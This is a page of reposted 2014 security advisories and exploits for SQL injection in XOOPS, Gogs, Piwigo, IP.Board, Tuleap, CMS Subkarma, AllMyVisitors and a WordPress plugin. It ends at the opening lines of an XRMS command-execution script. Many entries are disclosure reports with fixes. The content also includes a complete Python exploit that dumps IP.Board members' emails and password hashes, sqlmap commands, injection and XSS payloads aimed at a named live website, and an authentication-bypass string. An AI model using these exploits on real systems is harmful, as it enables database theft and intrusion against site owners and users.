MondoUnix Unix, Linux, FreeBSD, BSD, GNU, Kernel , RHEL, CentOS, Solaris, AIX, HP-UX, Mac OS X, Tru64, SCO UnixWare, Xenix, HOWTO, NETWORKING, IPV6

18Nov/140

XOOPS 2.5.6 SQL Injection

=============================================
MGC ALERT 2014-003
- Original release date: March 6, 2014
- Last revised:  November 18, 2014
- Discovered by: Manuel Garcia Cardenas
- Severity: 7,1/10 (CVSS Base Score)
=============================================
 
I. VULNERABILITY
-------------------------
Blind SQL Injection in XOOPS <= 2.5.6
 
II. BACKGROUND
-------------------------
XOOPS is an acronym of "eXtensible Object Oriented Portal System". Though
started as a portal system, it later developed into a web application
framework. It aims to serve as a web framework for use by small, medium and
large sites, through the installation of modules.
 
III. DESCRIPTION
-------------------------
It is possible to inject SQL code in the variable "selgroups" on the page
"admin.php". This bug was found using the portal with authentication. To
exploit the vulnerability only is needed use the version 1.0 of the HTTP
protocol to interact with the application.
 
IV. PROOF OF CONCEPT
-------------------------
The following URL's and parameters have been confirmed to all suffer from
Blind SQL injection.
 
/xoops/htdocs/modules/system/admin.php?fct=users&selgroups=1
 
Exploiting with SQLMap:
 
python sqlmap.py -u "
http://192.168.244.129/xoops/htdocs/modules/system/admin.php?fct=users&selgroups=1"
--cookie="PHPSESSID=kjrjempn828cgrv6k8tjp4fs60;xoops_user=0"  -p
"selgroups" --technique=TB --dbs
 
[INFO] POST parameter 'selgroups' is 'MySQL > 5.0.11 AND time-based blind
(comment)' injectable
[INFO] POST parameter 'selgroups' is 'OR boolean-based blind - WHERE or
HAVING clause (MySQL comment)' injectable
 
[INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[INFO] fetching database names
[INFO] fetching number of databases
[INFO] resumed: 4
[INFO] resumed: information_schema
[INFO] resumed: mysql
[INFO] resumed: phpmyadmin
[INFO] resumed: xoops
available databases [4]:
[*] information_schema
[*] mysql
[*] phpmyadmin
[*] xoops
 
V. BUSINESS IMPACT
-------------------------
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.
 
VI. SYSTEMS AFFECTED
-------------------------
XOOPS <= 2.5.6
 
VII. SOLUTION
-------------------------
Update to version 2.5.7
 
VIII. REFERENCES
-------------------------
http://xoops.org/
http://xoops.org/modules/news/article.php?storyid=6658
 
IX. CREDITS
-------------------------
This vulnerability has been discovered and reported
by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).
 
X. REVISION HISTORY
-------------------------
January 21, 2014 1: Initial release
 
XI. DISCLOSURE TIMELINE
-------------------------
March 5, 2014 1: Vulnerability acquired by Manuel Garcia Cardenas
March 5, 2014 2: Send to vendor
June 17, 2014 3: New version that includes patched code
http://xoops.org/modules/news/article.php?storyid=6658
November 18, 2014 4: Sent to lists
 
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
 
XIII. ABOUT
-------------------------
Manuel Garcia Cardenas
Pentester

(563)

16Nov/140

Gogs Repository Search SQL Injection

Unauthenticated SQL Injection in Gogs repository search
=======================================================
Researcher: Timo Schmid <tschmid@ernw.de>
 
 
Description
===========
Gogs(Go Git Service) is a painless self-hosted Git Service written in
Go. (taken
 from [1])
 
It is very similiar to the github hosting plattform. Multiple users can
create
multiple repositories and share code with others with the git version
control
system. Repositories can be marked as public or private to prevent
access from
 unauthorized users.
 
Gogs provides an api view to give javascript code the possibility to
search for
existing repositories in the system. This view is accessible at
/api/v1/repos/search?q=<search query>.
 
The q Parameter of this view is vulnerable to SQL injection.
 
 
Exploitation Technique
======================
Remote
 
 
Severity Level
==============
Critical
 
 
CVSS Base Score
===============
8.3 (AV:N / AC:M / Au:N / C:C / I:P / A:P)
 
 
CVE-ID
======
CVE-2014-8682
 
Impact
======
The vulnerability results at least in a complete compromise of the database.
Depending on the particular database configuration a compromise of the
system
is also possible.
 
 
Status
======
Fixed by Vendor
 
 
Vulnerable Code Section
=======================
models/repo.go:
[...]
// SearchRepositoryByName returns given number of repositories whose name
contains keyword.
func SearchRepositoryByName(opt SearchOption) (repos []*Repository, err
error) {
    // Prevent SQL inject.
    opt.Keyword = FilterSQLInject(opt.Keyword)
    if len(opt.Keyword) == 0 {
        return repos, nil
    }
    opt.Keyword = strings.ToLower(opt.Keyword)
 
    repos = make([]*Repository, 0, opt.Limit)
 
    // Append conditions.
    sess := x.Limit(opt.Limit)
    if opt.Uid > 0 {
        sess.Where("owner_id=?", opt.Uid)
    }
    if !opt.Private {
        sess.And("is_private=false")
    }
    sess.And("lower_name like '%" + opt.Keyword + "%'").Find(&repos)
    return repos, err
}
[...]
 
The vulnerability exists because of a string concatination in the SQL
query with
user supplied data. Because of the SQL filter at the method entry, attackers
can't use spaces (0x20) and since v0.5.6.1025-g83283b commas are also
filtered.
 
 
Proof of Concept
================
Request:
http://www.example.com/api/v1/repos/search?q=%27)%09UNION%09SELECT%09*%09FROM%09
(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09
user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)
%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09
as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as
%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09
a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09
JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN
%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN
%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN
%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN
%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN
%09(SELECT%09null)%09as%09a22%09where%09(%27%25%27=%27
 
Response:
{"data":[{"repolink":"bluec0re/test"},{"repolink":"bluec0re/secret"},{"repolink"
:"bluec0re/root@localhost"}],"ok":true}
 
 
Solution
========
This vulnerability could easily be fixed by using prepared statements:
 
sess.And("lower_name like ?", "%" + opt.Keyword + "%").Find(&repos)
 
Update to version 0.5.6.1105.
 
 
Affected Versions
=================
>= v0.3.1-9-g49dc57e
<= v0.5.6.1104-g0c5ba45
 
 
Timeline
========
2014-09-25: Developer informed
2014-10-16: Contact of developer regarding fix
2014-10-25: Working together with developer on fix
2014-11-03: Contacted developer
2014-11-04: Fixed in master branch
2014-11-14: CVE-ID assigned
 
 
Credits
=======
Pascal Turbing <pturbing@ernw.de>
Jiahua (Joe) Chen <u@gogs.io>
 
 
References
==========Update to version 0.5.6.1105.
[1] https://github.com/gogits/gogs
[2] http://gogs.io/
[3]
http://www.insinuator.net/2012/05/sql-injection-testing-for-business-purposes-part-1/
[4]
http://www.insinuator.net/2012/05/sql-injection-testing-for-business-purposes-part-2/
[5]
http://www.insinuator.net/2012/06/sql-injection-testing-for-business-purposes-part-3/
[6] https://www.ernw.de/download/BC-1402.txt
 
 
Advisory-ID
===========
BC-1402
 
 
Disclaimer
==========
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO
warranties, implied or otherwise, with regard to this information or its
use.
Any use of this information is at the user's risk. In no event shall the
author/
distributor be held liable for any damages whatsoever arising out of or in
connection with the use or spread of this information.
 
 
 
Unauthenticated SQL Injection in Gogs user search
=================================================
Researcher: Timo Schmid <tschmid@ernw.de>
 
 
Description
===========
Gogs(Go Git Service) is a painless self-hosted Git Service written in
Go. (taken
 from [1])
 
It is very similiar to the github hosting plattform. Multiple users can
create
multiple repositories and share code with others with the git version
control
system. Repositories can be marked as public or private to prevent
access from
 unauthorized users.
 
Gogs provides an api view to give javascript code the possibility to
search for
existing users in the system. This view is accessible at
/api/v1/users/search?q=<search query>.
 
The q Parameter of this view is vulnerable to SQL injection.
 
 
Exploitation Technique:
=======================
Remote
 
 
Severity Level:
===============
Critical
 
 
CVSS Base Score
===============
8.3 (AV:N / AC:M / Au:N / C:C / I:P / A:P)
 
 
CVE-ID
======
CVE-2014-8682
 
 
Impact
======
The vulnerability results at least in a complete compromise of the database.
Depending on the particular database configuration a compromise of the
system
is also possible.
 
 
Status
======
Fixed by Vendor
 
 
Vulnerable Code Section
=======================
models/user.go:
[...]
// SearchUserByName returns given number of users whose name contains
keyword.
func SearchUserByName(opt SearchOption) (us []*User, err error) {
    opt.Keyword = FilterSQLInject(opt.Keyword)
    if len(opt.Keyword) == 0 {
        return us, nil
    }
    opt.Keyword = strings.ToLower(opt.Keyword)
 
    us = make([]*User, 0, opt.Limit)
    err = x.Limit(opt.Limit).Where("type=0").And("lower_name like '%" +
opt.Keyword + "%'").Find(&us)
    return us, err
}
[...]
 
The vulnerability exists because of a string concatination in the SQL
query with
user supplied data. Because of the SQL filter at the method entry, attackers
can't use spaces (0x20) and since v0.5.6.1025-g83283b commas are also
filtered.
 
 
Proof of Concept
================
Request:
http://www.example.com/api/v1/users/search?q='/**/and/**/false)/**/union/**/
select/**/null,null,@@version,null,null,null,null,null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/from
/**/mysql.db/**/where/**/('%25'%3D'
 
Response:
{"data":[{"username":"5.5.40-0ubuntu0.14.04.1","avatar":
"//1.gravatar.com/avatar/"}],"ok":true}
 
 
Solution
========
This vulnerability could easily be fixed by using prepared statements:
 
err = x.Limit(opt.Limit).Where("type=0").And("lower_name like ?", "%" +
opt.Keyword + "%").Find(&us)
 
Update to version 0.5.6.1105.
 
 
Affected Versions
=================
>= v0.3.1-9-g49dc57e
<= v0.5.6.1104-g0c5ba45
 
 
Timeline
========
2014-09-25: Developer informed
2014-10-16: Contact of developer regarding fix
2014-10-25: Working together with developer on fix
2014-11-03: Contacted developer
2014-11-04: Fixed in master branch
2014-11-14: CVE-ID assigned
 
 
Credits
=======
Pascal Turbing <pturbing@ernw.de>
Jiahua (Joe) Chen <u@gogs.io>
 
 
References
==========
[1] https://github.com/gogits/gogs
[2] http://gogs.io/
[3]
http://www.insinuator.net/2012/05/sql-injection-testing-for-business-purposes-part-1/
[4]
http://www.insinuator.net/2012/05/sql-injection-testing-for-business-purposes-part-2/
[5]
http://www.insinuator.net/2012/06/sql-injection-testing-for-business-purposes-part-3/
[6] https://www.ernw.de/download/BC-1403.txt
 
 
Advisory-ID
===========
BC-1403
 
 
Disclaimer
==========
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO
warranties, implied or otherwise, with regard to this information or its
use.
Any use of this information is at the user's risk. In no event shall the
author/
distributor be held liable for any damages whatsoever arising out of or in
connection with the use or spread of this information.
 
 
- -- 
Timo Schmid
 
ERNW GmbH, Carl-Bosch-Str. 4, 69115 Heidelberg  -  www.ernw.de
Tel. +49 6221 480390 - Fax 6221 419008 - Cell +49 151 16227192
PGP-FP 971B D4F7 5DD1 FCED 11FC 2C61 7AB6 927D 6F26 6CE0
 
Handelsregister Mannheim: HRB 337135
Geschaeftsfuehrer: Enno Rey
 
==============================================================
|| Blog: www.insinuator.net | | Conference: www.troopers.de ||
==============================================================
==================   TROOPERS15   ==================
*   International IT Security Conference & Workshops
*   16th - 20st March 2015 / Heidelberg, Germany
*   www.troopers.de
====================================================

(148)

15Nov/140

Gogs Label Search Blind SQL Injection

 
Blind SQL Injection in Gogs label search
========================================
Researcher: Timo Schmid <tschmid@ernw.de>
 
 
Description
===========
Gogs(Go Git Service) is a painless self-hosted Git Service written in
Go. (taken
 from [1])
 
It is very similiar to the github hosting plattform. Multiple users can
create
multiple repositories and share code with others with the git version
control
system. Repositories can be marked as public or private to prevent
access from
 unauthorized users.
 
Gogs provides a view to filter issues by labels. This view is accessible at
/<username>/<repository>/issues?labels=&type=&state=
 
The labels Parameter of this view is vulnerable to a blind SQL injection.
 
 
Exploitation Technique:
=======================
Remote
 
 
Severity Level:
===============
Critical
 
 
CVSS Base Score
===============
6.6 (AV:N / AC:H / Au:N / C:C / I:P / A:P)
 
 
CVE-ID
======
CVE-2014-8681
 
 
Impact
======
The vulnerability results at least in a complete compromise of the database.
Depending on the particular database configuration a compromise of the
system
is also possible.
 
 
Status
======
Fixed by Vendor
 
 
Vulnerable Code Section
=======================
models/issue.go:
[...]
// GetIssues returns a list of issues by given conditions.
func GetIssues(uid, rid, pid, mid int64, page int, isClosed bool, labelIds,
sortType string) ([]Issue, error) {
    sess := x.Limit(20, (page-1)*20)
 
    if rid > 0 {
        sess.Where("repo_id=?", rid).And("is_closed=?", isClosed)
    } else {
        sess.Where("is_closed=?", isClosed)
    }
 
    if uid > 0 {
        sess.And("assignee_id=?", uid)
    } else if pid > 0 {
        sess.And("poster_id=?", pid)
    }
 
    if mid > 0 {
        sess.And("milestone_id=?", mid)
    }
 
    if len(labelIds) > 0 {
        for _, label := range strings.Split(labelIds, ",") {
            sess.And("label_ids like '%$" + label + "|%'")
        }
    }
[...]
 
The vulnerability exists because of a string concatination in the SQL
query with
user supplied data. A attacker is restricted to not use commas in the
injection
string as the program splits input at commas.
 
 
Proof of Concept
================
Test of version string contains at least 10 characters:
http://www.example.com/user/repos/issues?label=' or
char_length(@@version) > 10
and '|%'='&type=all&state=
 
Returns all issues if true, non if false.
 
This could be used to extract data with a binary search.
 
 
Solution
========
This vulnerability could easily be fixed by using prepared statements:
 
sess.And("label_ids like ?", "%$" + label + "|%")
 
Update to Version 0.5.6.1025.
 
Affected Versions
=================
>= v0.3.1-9-g49dc57e
<= v0.5.6.1024-gf1d8746
 
 
Timeline
========
2014-09-25: Developer informed
2014-10-16: Contact of developer regarding fix
2014-10-25: Working together with developer on fix
2014-10-25: Fixed by ensuring datatype of user input
2014-11-14: CVE-ID assigned
 
 
Credits
=======
Pascal Turbing <pturbing@ernw.de>
Jiahua (Joe) Chen <u@gogs.io>
 
 
References
==========
[1] https://github.com/gogits/gogs
[2] http://gogs.io/
[3]
http://www.insinuator.net/2012/05/sql-injection-testing-for-business-purposes-part-1/
[4]
http://www.insinuator.net/2012/05/sql-injection-testing-for-business-purposes-part-2/
[5]
http://www.insinuator.net/2012/06/sql-injection-testing-for-business-purposes-part-3/
[6] https://www.ernw.de/download/BC-1401.txt
 
 
Advisory-ID
===========
BC-1401
 
 
Disclaimer
==========
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO
warranties, implied or otherwise, with regard to this information or its
use.
Any use of this information is at the user's risk. In no event shall the
author/
distributor be held liable for any damages whatsoever arising out of or in
connection with the use or spread of this information.
 
- -- 
Timo Schmid
 
ERNW GmbH, Carl-Bosch-Str. 4, 69115 Heidelberg  -  www.ernw.de
Tel. +49 6221 480390 - Fax 6221 419008 - Cell +49 151 16227192
PGP-FP 971B D4F7 5DD1 FCED 11FC 2C61 7AB6 927D 6F26 6CE0
 
Handelsregister Mannheim: HRB 337135
Geschaeftsfuehrer: Enno Rey
 
==============================================================
|| Blog: www.insinuator.net | | Conference: www.troopers.de ||
==============================================================
==================   TROOPERS15   ==================
*   International IT Security Conference & Workshops
*   16th - 20st March 2015 / Heidelberg, Germany
*   www.troopers.de
====================================================

(177)

14Nov/140

Piwigo <= v2.6.0 – Blind SQL Injection

=============================================
MGC ALERT 2014-001
- Original release date: January 12, 2014
- Last revised:  November 12, 2014
- Discovered by: Manuel García Cárdenas
- Severity: 7,1/10 (CVSS Base Score)
=============================================
 
I. VULNERABILITY
-------------------------
Blind SQL Injection in Piwigo <= v2.6.0
 
II. BACKGROUND
-------------------------
Piwigo is a web application management photo albums, available under the License GPL.
Is written in PHP and requires a MySQL, PostgreSQL or SQLite data.
 
III. DESCRIPTION
-------------------------
This bug was found using the portal without authentication. To exploit the vulnerability only is needed use the version 1.0 of the HTTP protocol to interact with the application.
It is possible to inject SQL code in the variable "rate" on the page "picture.php".
 
IV. PROOF OF CONCEPT
-------------------------
The following URL's and parameters have been confirmed to all suffer from Blind SQL injection.
 
/piwigo/picture.php?/1/category/1&action=rate (POST parameter: rate=1)
 
Exploiting with SQLMap:
 
python sqlmap.py -u "http://192.168.244.129/piwigo/picture.php?/1/category/1&action=rate"; --data
"rate=1" --dbs
 
[16:32:25] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[16:32:25] [INFO] fetching database names
[16:32:25] [INFO] fetching number of databases
[16:32:25] [INFO] resumed: 4
[16:32:25] [INFO] resumed: information_schema
[16:32:25] [INFO] resumed: mysql
[16:32:25] [INFO] resumed: phpmyadmin
[16:32:25] [INFO] resumed: piwigo
available databases [4]:
[*] information_schema
[*] mysql
[*] phpmyadmin
[*] piwigo
 
V. BUSINESS IMPACT
-------------------------
Public defacement, confidential data leakage, and database server compromise can result from these attacks. 
Client systems can also be targeted, and complete compromise of these client systems is also possible.
 
VI. SYSTEMS AFFECTED
-------------------------
Piwigo <= v2.6.0
 
VII. SOLUTION
-------------------------
All data received by the application and can be modified by the user,before making any kind of transaction with them must be validated.
 
VIII. REFERENCES
-------------------------
http://www.piwigo.org
 
IX. CREDITS
-------------------------
This vulnerability has been discovered and reported by Manuel García Cárdenas (advidsec (at) gmail (dot) com).
 
X. REVISION HISTORY
-------------------------
January 21, 2014 1: Initial release
 
 
XI. DISCLOSURE TIMELINE
-------------------------
January 21, 2014 1: Vulnerability acquired by Manuel Garcia Cardenas November 12, 2014 2: Send to the Full-Disclosure lists
 
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
 
XIII. ABOUT
-------------------------
Manuel Garcia Cardenas
Pentester

(333)

11Nov/140

IP.Board 3.4.7 SQL Injection

#!/usr/bin/env python
# Sunday, November 09, 2014 - secthrowaway@safe-mail.net
# IP.Board <= 3.4.7 SQLi (blind, error based); 
# you can adapt to other types of blind injection if 'cache/sql_error_latest.cgi' is unreadable
 
url = 'http://target.tld/forum/'
ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"
 
import sys, re
 
# <socks> - http://sourceforge.net/projects/socksipy/
#import socks, socket
#socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050)
#socket.socket = socks.socksocket
# </socks>
 
import urllib2, urllib
 
def inject(sql):
  try:
    urllib2.urlopen(urllib2.Request('%sinterface/ipsconnect/ipsconnect.php' % url, data="act=login&idType=id&id[]=-1&id[]=%s" % urllib.quote('-1) and 1!="\'" and extractvalue(1,concat(0x3a,(%s)))#\'' % sql), headers={"User-agent": ua}))
  except urllib2.HTTPError, e:
    if e.code == 503:
      data = urllib2.urlopen(urllib2.Request('%scache/sql_error_latest.cgi' % url, headers={"User-agent": ua})).read()
      txt = re.search("XPATH syntax error: ':(.*)'", data, re.MULTILINE)
      if txt is not None: 
        return txt.group(1)
      sys.exit('Error [3], received unexpected data:\n%s' % data)
    sys.exit('Error [1]')
  sys.exit('Error [2]')
 
def get(name, table, num):
  sqli = 'SELECT %s FROM %s LIMIT %d,1' % (name, table, num)
  s = int(inject('LENGTH((%s))' % sqli))
  if s < 31:
    return inject(sqli)
  else:
    r = ''
    for i in range(1, s+1, 31):
      r += inject('SUBSTRING((%s), %i, %i)' % (sqli, i, 31))
    return r
 
n = inject('SELECT COUNT(*) FROM members')
print '* Found %s users' % n
for j in range(int(n)):  
  print get('member_id', 'members', j)
  print get('name', 'members', j)
  print get('email', 'members', j)
  print get('CONCAT(members_pass_hash, 0x3a, members_pass_salt)', 'members', j)
  print '----------------'

(850)

29Oct/140

Tuleap 7.4.99.5 Blind SQL Injection

Vulnerability title: Tuleap <= 7.4.99.5 Authenticated Blind SQL Injection in Enalean Tuleap
CVE: CVE-2014-7176
Vendor: Enalean
Product: Tuleap
Affected version: 7.4.99.5 and earlier
Fixed version: 7.5
Reported by: Jerzy Kramarz
 
Details:
 
SQL injection has been found and confirmed within the software as an authenticated user. A successful attack could allow an authenticated attacker to access information such as usernames and password hashes that are stored in the database. The following URLs and parameters have been confirmed to suffer from SQL injections:
 
 
GET /plugins/docman/?group_id=100&id=16&action=search&global_txt=a<SQL Injection>&global_filtersubmit=Apply HTTP/1.1
Host: 192.168.56.108
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.56.108/plugins/docman/?group_id=100
Cookie: PHPSESSID=3pt0ombsmp0t9adujgrohv8mb6; TULEAP_session_hash=d51433e1f7c9b49079c0e5c511d64c96
Connection: keep-alive
 
 
Note: In order to exploit this vulnerability a attacker needs to be in position to access '/plugins/docman/' URN.
 
 
Further details at:
 
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-7176/
 
Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
 
Disclaimer:
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
 
 
###############################################################
This email originates from the systems of Portcullis
Computer Security Limited, a Private limited company, 
registered in England in accordance with the Companies 
Act under number 02763799. The registered office 
address of Portcullis Computer Security Limited is: 
Portcullis House, 2 Century Court, Tolpits Lane, Watford, 
United Kingdom, WD18 9RS.  
The information in this email is confidential and may be 
legally privileged. It is intended solely for the addressee. 
Any opinions expressed are those of the individual and 
do not represent the opinion of the organisation. Access 
to this email by persons other than the intended recipient 
is strictly prohibited.
If you are not the intended recipient, any disclosure, 
copying, distribution or other action taken or omitted to be 
taken in reliance on it, is prohibited and may be unlawful. 
When addressed to our clients any opinions or advice 
contained in this email is subject to the terms and 
conditions expressed in the applicable Portcullis Computer 
Security Limited terms of business.
###############################################################
 
#####################################################################################
This e-mail message has been scanned for Viruses and Content and cleared 
by MailMarshal.
#####################################################################################

(130)

14Oct/140

CMS Subkarma Cross Site Scripting / SQL Injection

# Multiple SQL Injection & XSS on CMS SUBKARMA
 
# Risk: High
 
# CWE number: CWE-89,CWE-79
 
# Date: 13/10/2014
 
# Vendor: www.jttel.com.tw
 
# Author: Felipe " Renzi " Gabriel
 
# Contact: renzi@linuxmail.org
 
# Tested on:  Linux Mint ; Firefox ; Sqlmap 1.0-dev-nongit-20140906
 
# Vulnerables File: news.php ; product.php ; pro_con.php
 
# Exploits: http://www.target.com/news.php?id=[XSS]
 
            http://www.target.com/product.php?cat_id=[SQLI] & [XSS]
 
            http://www.target.com/pro_con.php?id=[SQLI] & [XSS]
 
 
# PoC:      http://www.cideko.com/product.php?cat_id=18  
 
            http://www.cideko.com/pro_con.php?id=3 
 
 
--- "SQLI using SQLMAP."--- 
 
    Place: GET
    Parameter: cat_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat_id=18 AND 6427=6427
 
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: cat_id=18 AND 7867=BENCHMARK(5000000,MD5(0x4d666b6e))
---
 
 
--- " XSS using HTML injection."---
 
    http://www.cideko.com/news.php?id=38"><marquee>XSS</marquee>
 
    http://www.cideko.com/product.php?cat_id=18"><marquee>XSS</marquee>
 
    http://www.cideko.com/pro_con.php?id=3"><marquee>XSS</marquee>
 
# Note
 
The SQL Injection on file pro_con.php parameter id, was published by Ali Pandidan.
Reference, http://cxsecurity.com/issue/WLB-2011020004 .
 
# Thank's

(169)

3Oct/140

AllMyVisitors 0.5.0 SQL Injection

AllMyVisitors0.5.0 Blind SQL Injection Vulnerability
====================================================
Author : indoushka
Vondor : http://www.php-resource.net/
Dork:    Copyright (c) 2004 by voice of web
==========================
 
SQL injection is a vulnerability that allows an attacker to alter back-end SQL statements by manipulating the user input. An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and doesn't properly filter out dangerous characters. 
 
This is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it is relatively easy to protect against, there is a large number of web applications vulnerable.
This vulnerability affects /AllMyVisitors0.5.0/. 
Discovered by: Scripting (Blind_Sql_Injection.script). 
Attack details
HTTP Header input Referer was set to if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/
 
Tests performed: 
if(now()=sysdate(),sleep(2),0)/*'XOR(if(now()=sysdate(),sleep(2),0))OR'"XOR(if(now()=sysdate(),sleep(2),0))OR"*/ => 6.099 s
if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/ => 18.439 s
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ => 0.561 s
if(now()=sysdate(),sleep(4),0)/*'XOR(if(now()=sysdate(),sleep(4),0))OR'"XOR(if(now()=sysdate(),sleep(4),0))OR"*/ => 12.558 s
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ => 0.515 s
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ => 0.53 s
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ => 0.468 s
if(now()=sysdate(),sleep(4),0)/*'XOR(if(now()=sysdate(),sleep(4),0))OR'"XOR(if(now()=sysdate(),sleep(4),0))OR"*/ => 12.496 s
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ => 0.577 s
 
Insecure Cookie Handling :
 
admin.php
 
javascript:document.cookie="allmyphp_cookie=' or ' 1=1--;path=/";
 
Auth Bypass :
 
admin.php
 
 Username : azerty' or '1=1--# Real admin name
 Password : demo1 ' or ' 1=1 or ADmin or  any thing

(163)

2Oct/140

WordPress Content Audit 1.6 Blind SQL Injection

Details
================
Software: Content Audit
Version: 1.6
Homepage: http://wordpress.org/plugins/content-audit/
Advisory report: https://security.dxw.com/advisories/blind-sqli-vulnerability-in-content-audit-could-allow-a-privileged-attacker-to-exfiltrate-password-hashes/
CVE: CVE-2014-5389
CVSS: 3.6 (Low; AV:N/AC:H/Au:S/C:P/I:N/A:P)
 
Description
================
Blind SQLi vulnerability in Content Audit could allow a privileged attacker to exfiltrate password hashes
 
Vulnerability
================
An attacker with an admin account is able to add arbitrary text in the “Audited content types” option by using a DOM inspector to modify the value of a checkbox field. This text is then inserted into an SQL query and executed as part of a daily wp-cron job.
The fact that this is run only once a day makes it rather minor. An attacker would potentially need to poll /wp-cron.php repeatedly for 24 hours until they got the first result. As blind SQL injection attacks are usually done by comparing the first character to all possible characters – one at a time, until a match is found – it would take a very long time to exfiltrate useful data.
However, we don’t discount the possibility that someone cleverer than us could figure out a more practical attack.
 
Proof of concept
================
Steps an attacker may take:
 
Visit /wp-admin/options-general.php?page=content-audit
Check an “Audited content types” checkbox
Right-click that checkbox and select “Inspect element”
Set the value attribute of the element to something which does sleep(5) if the first byte of the admin’s password hash is ‘a’ or sleep(10) otherwise
Press “Update Options”
Poll /wp-cron.php repeatedly until it takes longer than 5 seconds and record how long the request took
Repeat
 
Steps to take to verify that this issue exists:
 
Visit /wp-admin/options-general.php?page=content-audit
Check a “Audited content types” checkbox
Right-click that checkbox and select “Inspect element”
Set the value attribute of the element to “‘” (a single apostrophe)
Press “Update Options”
Add “add_action(‘init’, ‘content_audit_mark_outdated’);” to content-audit-schedule.php somewhere and load any page
This error should occur: “WordPress database error You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘2013-08-12′”
If you replace “$oldposts = $wpdb->get_results” with “echo” on line 134 of content-audit-schedule.php you’ll notice that it’s inserting the ‘ unescaped – which means that you can insert whatever you like
 
 
Mitigations
================
You should update to version 1.62.
 
Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/
 
Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.
 
This vulnerability will be published if we do not receive a response to this report with 14 days.
 
Timeline
================
 
2014-08-11 – Discovered
2014-08-21 – Requested author email address via a contact form
2014-08-27 – Reported to author via email
2014-09-22 – No response from author; reminder sent
2014-09-23 – Author responded
2014-09-24 – Fix released
2014-10-01 – Published
 
 
 
Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.

(188)

28Aug/140

XRMS Blind SQL Injection / Command Execution

#######################
# XRMS Blind SQLi via $_SESSION poisoning, then command exec
#########################
 
import urllib
import urllib2
import time
import sys
 
